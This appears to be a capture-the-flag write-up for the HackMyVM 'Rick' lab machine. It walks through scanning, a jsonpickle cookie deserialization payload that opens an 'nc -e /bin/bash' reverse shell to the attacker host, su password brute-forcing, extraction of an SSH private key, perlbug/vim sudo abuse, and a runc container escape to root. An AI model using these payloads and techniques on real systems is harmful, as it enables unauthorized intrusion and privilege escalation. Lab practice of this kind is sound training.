HackMyVm - Rick
Rick is a hard machine written by cromiphi, its a bit awkward to get the first step and get to the first user account, but subsequent user and root is a bit more straight forward.
Find it
┌──(kali㉿kali)-[~/rick]
└─$ sudo netdiscover -r 10.0.0.0/24 -P 1 ⨯
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:dd:6d:f0 1 60 PCS Systemtechnik GmbH
10.0.0.55 08:00:27:94:4a:67 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
┌──(kali㉿kali)-[~/rick]
└─$ nmap -T4 -sC -sV -oN nmap.log 10.0.0.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 14:44 EST
Nmap scan report for 10.0.0.55
Host is up (0.00063s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_ 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
5000/tcp open http Werkzeug httpd 0.15.5 (Python 2.7.16)
| http-title: 500 Internal Server Error
|_Requested resource was http://10.0.0.55:5000/whoami
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
└─$ ssh 10.0.0.55
kali@10.0.0.55: Permission denied (publickey).
http 5000
Getting a foothold
└─$ curl -v http://10.0.0.55:5000/
* Trying 10.0.0.55:5000...
* Connected to 10.0.0.55 (10.0.0.55) port 5000 (#0)
> GET / HTTP/1.1
> Host: 10.0.0.55:5000
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 302 FOUND
< Content-Type: text/html; charset=utf-8
< Content-Length: 221
< Location: http://10.0.0.55:5000/whoami
< Set-Cookie: username=eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0=; Path=/
< Server: Werkzeug/0.15.5 Python/2.7.16
< Date: Mon, 29 Nov 2021 11:39:18 GMT
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href="/whoami">/whoami</a>. If not click the link.
┌──(kali㉿kali)-[~/rick]
└─$ echo "eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0="|base64 -d
{"py/object": "__main__.User", "username": "Rick"}
└─$ python3 peas.py 1 ⨯
Enter RCE command :nc -e /bin/bash 10.0.0.10 8888
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :picklerick
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :jsonpickle
Done Saving file !!!!
┌──(kali㉿kali)-[~/rick]
└─$ cat picklerick_jspick
eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTAuMC4wLjEwIiwgIjg4ODgiXX1dfV19
(the filename is appended with _jspick) but it just needs turning into a username cookie.
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["nc", "-e", "/bin/bash", "10.0.0.10", "8888"]}]}]}
Setup a listener first, then send the command.
┌──(kali㉿kali)-[~/rick]
└─$ curl --cookie "username=eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTAuMC4wLjEwIiwgIjg4ODgiXX1dfV19" http://10.0.0.55:5000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.55] 35562
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /home/morty/.important
-***You are completely crazy Morty to keep a password that easy! Change it before you get hacked!***-
As ssh requires a key then it must be done on box. I transferred the following repository to the target from my kali box.
www-data@rick:/dev/shm$ sh suBF.sh
sh suBF.sh
This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).
You can specify a username using -u <username> and a wordlist via -w <wordlist>.
By default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete
You can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).
Fastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete
Example: ./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
THE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL
www-data@rick:/dev/shm$ sh ./suBF -u morty -w top12000.txt
sh ./suBF -u morty -w top12000.txt
sh: 0: Can't open ./suBF
www-data@rick:/dev/shm$ sh ./suBF.sh -u morty -w top12000.txt
sh ./suBF.sh -u morty -w top12000.txt
[+] Bruteforcing morty...
You can login as morty using password: internet
www-data@rick:/dev/shm$
cat /home/morty/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn....
└─$ ssh morty@10.0.0.55 -i morty_rsa
Linux rick 4.19.0-18-686 #1 SMP Debian 4.19.208-1 (2021-09-29) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 28 21:45:17 2021 from 10.0.0.10
morty@rick:~$
Escalate to Rick (user)
morty@rick:~$ sudo -l
Matching Defaults entries for morty on rick:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User morty may run the following commands on rick:
(rick) NOPASSWD: /usr/bin/perlbug
morty@rick:~$ sudo -u rick perlbug
This program provides an easy way to create a message reporting
a bug in the core perl distribution (along with tests or
patches) to the volunteers who maintain perl at
perlbug@perl.org. To send a thank-you note to perl-
thanks@perl.org instead of a bug report, please run
'perlthanks'.
Editor [editor]: vim
(same method as "morty")
rick@rick:/home/morty$ id
uid=1000(rick) gid=1000(rick) groups=1000(rick)
Escalate to root
rick@rick:~$ sudo -l
Matching Defaults entries for rick on rick:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rick may run the following commands on rick:
(ALL : ALL) NOPASSWD: /usr/sbin/runc
rick@rick:~$
rick@rick:~$ cd /dev/shm
rick@rick:/dev/shm$ ls
rick@rick:/dev/shm$ /usr/sbin/runc spec
rick@rick:/dev/shm$ ls
config.json
rick@rick:/dev/shm$ nano config.json
Inside the "mounts" section of the create config.json add the following lines:
rick@rick:/dev/shm$ mkdir rootfs
rick@rick:/dev/shm$ sudo /usr/sbin/runc run demo
# id
uid=0(root) gid=0(root) groups=0(root)
#
# cd /root
# ls
root.txt
# touch test
touch: cannot touch 'test': Read-only file system
#
"root": {
"path": "rootfs",
"readonly": false
},
Comments
Post a Comment